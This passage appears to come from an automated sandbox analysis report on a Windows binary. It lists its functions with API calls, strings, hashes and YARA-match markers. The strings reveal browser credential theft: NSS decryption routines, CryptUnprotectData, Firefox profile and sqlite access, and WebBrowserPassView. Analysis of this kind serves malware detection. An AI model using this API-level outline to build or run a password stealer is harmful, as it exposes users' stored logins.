                                                  • Opcode ID: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
                                                  • Instruction ID: a26663696ee19f03613d77843e46d9f39b2dea1a9069363f3edb82d48ea13a69
                                                  • Opcode Fuzzy Hash: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
                                                  • Instruction Fuzzy Hash: FFC092346205028BE23C5F38AD5A82A77E0BF4A3313B40F6CA0F3D20F0EB3884428A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004117E3, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
                                                  • Instruction ID: 28a9858cfff7e6e2b1914a1c804994c03dcb5394f8963e6e43683e707f81cfe3
                                                  • Opcode Fuzzy Hash: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
                                                  • Instruction Fuzzy Hash: 83C04C351107028BE7218B12C849753B7F8BB00717F40C818A566859A0D77CE454CE18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411F7E, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumResourceNamesW.KERNELBASE(?,?,00411EF8,00000000), ref: 00411F8D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
                                                  • Instruction ID: 6c621939844f31da33ced499d0f7f7abb962291178acb537878d9391fa7c1b50
                                                  • Opcode Fuzzy Hash: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
                                                  • Instruction Fuzzy Hash: C8C09B32194342BBD7019F508C05F1B7A95BB55703F104C297561940B0C75140549605
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407548, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
                                                  • Instruction ID: 786af1a6681fc588f4ed673612d44b37cd66a9ddadc6b0c90f2aca86fde3c3ed
                                                  • Opcode Fuzzy Hash: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
                                                  • Instruction Fuzzy Hash: 41B012792100404BCB080B349C4504D75506F46B32B20473CB073C00F0DB30CD70BA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411B67, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
                                                  • Instruction ID: 8fd1618fdc001f910610ea30bed12e65be45571f6aff6d2ea6de46bc6098db87
                                                  • Opcode Fuzzy Hash: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
                                                  • Instruction Fuzzy Hash: F8C09B35544301BFDE114F40FD05F09BF71BB84F05F004414B244640B1C2714414EB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004081EA, Relevance: 1.4, APIs: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                  • free.MSVCRT(?,00000000,?,00000000), ref: 004082B2
                                                    • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                    • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                    • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                    • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3401966785-0
                                                  • Opcode ID: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                  • Instruction ID: 9a294873d4d6790ac16ff047b4da0d243ffe3cbd3c442eed78fe53e82fef6e86
                                                  • Opcode Fuzzy Hash: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                  • Instruction Fuzzy Hash: 22513672D006099BCB10DF99C5804DEBBB5BB48314F60817FE990B7391DB38AE85CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00419681, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71768e3b57be439b0f9ce1a84ee98f19883832beed36a2a3ef83e6d3b54edd1a
                                                  • Instruction ID: 4be01e504a1dbe863e5cd1883b5f47abe9c308d3627063d178914d84215e5ed1
                                                  • Opcode Fuzzy Hash: 71768e3b57be439b0f9ce1a84ee98f19883832beed36a2a3ef83e6d3b54edd1a
                                                  • Instruction Fuzzy Hash: 32319E31614206EFDF14AF15D9517DAB3A0FF00364F11412BF8259B290EB38EDE09BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004085EB, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00408604: ??3@YAXPAX@Z.MSVCRT ref: 0040860B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@
                                                  • String ID:
                                                  • API String ID: 1936579350-0
                                                  • Opcode ID: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
                                                  • Instruction ID: 922d8024f7c410ba2bf811e6c001bae8f16a2ee087a1061d919dd730706e44d9
                                                  • Opcode Fuzzy Hash: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
                                                  • Instruction Fuzzy Hash: 36C02B3241D2101FD764FFB4360205722D4CE822383014C2FF0C0D3100DD3884014B4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408037, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                  • Instruction ID: b2304b4461d9917b15a132db01dd128865174dbe20628525ae7b4e3248e143f9
                                                  • Opcode Fuzzy Hash: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                  • Instruction Fuzzy Hash: 17C08CB24107018FF7308F11C905322B3E4AF0073BFA08C0EA0D0914C2DBBCD084CA08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402778, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                  • Instruction ID: cac01d1bc301b84fbdbddb48431dcac5afc2edf88536e2650f831a4bf4b80b8a
                                                  • Opcode Fuzzy Hash: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                  • Instruction Fuzzy Hash: 7AC00272550B019FF7609F15C94A762B3E4AF5077BF918C1DA4A5924C1E7BCD4448A18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412B6F, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                  • Instruction ID: 46b4f55e9d8111901284769a6e1cf788246b5727949f953e2d9518689c8df02f
                                                  • Opcode Fuzzy Hash: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                  • Instruction Fuzzy Hash: AC900282455501216C4522755D1750511080851176374074A7032A59D1DE688150601C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00415AFD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 00415B06
                                                    • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B2D
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B56
                                                  • LocalFree.KERNEL32(?), ref: 00415B71
                                                  • free.MSVCRT(?,0044A338,?), ref: 00415B9F
                                                    • Part of subcall function 00414C63: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,00414D8E,?), ref: 00414C81
                                                    • Part of subcall function 00414C63: malloc.MSVCRT ref: 00414C88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                  • String ID: OsError 0x%x (%u)
                                                  • API String ID: 2360000266-2664311388
                                                  • Opcode ID: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
                                                  • Instruction ID: b695a5953d892c14765524e538430075cec87daac3f875befcc4cde39e80dde6
                                                  • Opcode Fuzzy Hash: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
                                                  • Instruction Fuzzy Hash: 5F118E34A00218BBDB21AFA19C49CDFBF78EF85B51B104067F405A2250D6795B809BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407E0E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00407E26
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00407E45
                                                  • FindClose.KERNEL32(00000000), ref: 00407E65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID: .$ld@$nss3.dll
                                                  • API String ID: 3541575487-3654816495
                                                  • Opcode ID: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                  • Instruction ID: 78963b1eb2bf7b5f8aa15039180698213c9a680973a94e339c68aae197af375e
                                                  • Opcode Fuzzy Hash: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                  • Instruction Fuzzy Hash: CEF0BB75901528ABDB206BB4DC8C9ABB7ACEB45765F0401B2ED06E3180D334AE458AD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004021D9, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00402201
                                                  • _wcsicmp.MSVCRT ref: 00402231
                                                  • _wcsicmp.MSVCRT ref: 0040225E
                                                  • _wcsicmp.MSVCRT ref: 0040228B
                                                    • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                    • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                  • memset.MSVCRT ref: 0040262F
                                                  • memcpy.MSVCRT ref: 00402664
                                                    • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                    • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                    • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                  • memcpy.MSVCRT ref: 004026C0
                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040271E
                                                  • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040272D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                  • API String ID: 462158748-1134094380
                                                  • Opcode ID: 67cf4eee38665e4ec1be56c90270dd44ce6e0e009cbb4a5b7d9f17bd5b1e0b61
                                                  • Instruction ID: cc44404655acc20b5533cc0c34fbbab0c7f11d0fd0cfcd5d05bb593c6a12ed59
                                                  • Opcode Fuzzy Hash: 67cf4eee38665e4ec1be56c90270dd44ce6e0e009cbb4a5b7d9f17bd5b1e0b61
                                                  • Instruction Fuzzy Hash: C9F1FF208087E9C9DB32D7788D097CEBE645B23324F0443D9E1E87A2D2D7B55B85CB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00441975, Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004419A0
                                                  • wcscpy.MSVCRT ref: 004419B7
                                                  • memset.MSVCRT ref: 004419EA
                                                  • wcscpy.MSVCRT ref: 00441A00
                                                  • wcscat.MSVCRT ref: 00441A11
                                                  • wcscpy.MSVCRT ref: 00441A37
                                                  • wcscat.MSVCRT ref: 00441A48
                                                  • wcscpy.MSVCRT ref: 00441A6F
                                                  • wcscat.MSVCRT ref: 00441A80
                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                  • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000104,00000000), ref: 00441AB9
                                                  • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000104,00000000), ref: 00441AC7
                                                  • LoadLibraryW.KERNEL32(nss3.dll,?,00000104,00000000), ref: 00441AD7
                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00441B0C
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00441B19
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00441B26
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00441B33
                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00441B40
                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00441B4D
                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00441B5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                  • API String ID: 2522319644-522817110
                                                  • Opcode ID: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                  • Instruction ID: 320c17c5e6ace6947bedab1e2bf77c9c6d077df099d9b5840aba930edb5fc244
                                                  • Opcode Fuzzy Hash: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                  • Instruction Fuzzy Hash: 855165B1901709BADB20FFB18D49A4BB7F8AF08704F5008ABE54AE2551E778E644CF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B6A, Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 275stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                  • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                  • API String ID: 2787044678-1843504584
                                                  • Opcode ID: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                  • Instruction ID: bbe16b9e6473d86cc6eed57c0ed50d6d6787e5e5d2f3b2995f82d19aea11410f
                                                  • Opcode Fuzzy Hash: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                  • Instruction Fuzzy Hash: 2891A571940209BFEF20EF55CD41EDF77A8AF54314F10006AF848A3292EB79EE508B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004113F4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00411421
                                                  • GetDlgItem.USER32 ref: 0041142D
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041143C
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00411448
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 00411451
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041145D
                                                  • GetWindowRect.USER32 ref: 0041146F
                                                  • GetWindowRect.USER32 ref: 0041147A
                                                  • MapWindowPoints.USER32 ref: 0041148E
                                                  • MapWindowPoints.USER32 ref: 0041149C
                                                  • GetDC.USER32 ref: 004114D5
                                                  • wcslen.MSVCRT ref: 00411515
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00411526
                                                  • ReleaseDC.USER32 ref: 00411573
                                                  • _snwprintf.MSVCRT ref: 00411636
                                                  • SetWindowTextW.USER32(?,?), ref: 0041164A
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00411668
                                                  • GetDlgItem.USER32 ref: 0041169E
                                                  • GetWindowRect.USER32 ref: 004116AE
                                                  • MapWindowPoints.USER32 ref: 004116BC
                                                  • GetClientRect.USER32 ref: 004116D3
                                                  • GetWindowRect.USER32 ref: 004116DD
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411723
                                                  • GetClientRect.USER32 ref: 0041172D
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411765
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 2080319088-3046471546
                                                  • Opcode ID: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                  • Instruction ID: 8ff438caca04d900f401a49fee0f0db12add2221ca5be9c1dac879361ae65e4d
                                                  • Opcode Fuzzy Hash: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                  • Instruction Fuzzy Hash: E3B1B071108341AFD720DF68C985E6BBBF9FB88704F004A2DF69692261DB75E944CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040109F, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                  • String ID: WebBrowserPassView
                                                  • API String ID: 829165378-2171583229
                                                  • Opcode ID: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                  • Instruction ID: 8d9c6eba8ddb3a7c26c98eaf12cf57faa7ce2db5dd3d1d54ce32cd9ff2fd20fc
                                                  • Opcode Fuzzy Hash: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                  • Instruction Fuzzy Hash: 8C517E35500308BBDB22AF64DC45E6E7BB5FB04742F104A7AF952A66F0C774AE50EB18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F767, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • {Unknown}, xrefs: 0040F831
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040FA0E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                  • API String ID: 4111938811-1819279800
                                                  • Opcode ID: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                  • Instruction ID: 69e9f0bde0ef3093fe47e3bafb281a214b560c7f74f151c34d98b156b899ddfd
                                                  • Opcode Fuzzy Hash: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                  • Instruction Fuzzy Hash: F7719FB680121DBEEF219B50DC45EDA7B6CEF08355F0000B6F508A21A1DA799E88CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040FAFF, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040FB20
                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                  • memset.MSVCRT ref: 0040FB90
                                                  • wcslen.MSVCRT ref: 0040FB9D
                                                  • wcslen.MSVCRT ref: 0040FBAC
                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040FC6B
                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040FC77
                                                    • Part of subcall function 0040648C: memset.MSVCRT ref: 004064AD
                                                    • Part of subcall function 0040648C: memset.MSVCRT ref: 004064FA
                                                    • Part of subcall function 0040648C: RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                    • Part of subcall function 0040648C: wcscpy.MSVCRT ref: 00406642
                                                    • Part of subcall function 0040648C: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                    • Part of subcall function 0040648C: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                  • API String ID: 2554026968-4029219660
                                                  • Opcode ID: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                  • Instruction ID: eeb2f36212a21d3aa086fe7dd3a0485c0e35c5a93e030d286215ed8b11f998db
                                                  • Opcode Fuzzy Hash: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                  • Instruction Fuzzy Hash: 15418371940309ABEB209F61CC85E9AB7F8BF58744F10087EE58593191EBB999848F58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F4F7, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                  • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                  • API String ID: 3014334669-2600475665
                                                  • Opcode ID: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                  • Instruction ID: ca42eae1a8a54deb15ae60d9a008fbbac9316f2c57223d03809256618168ca92
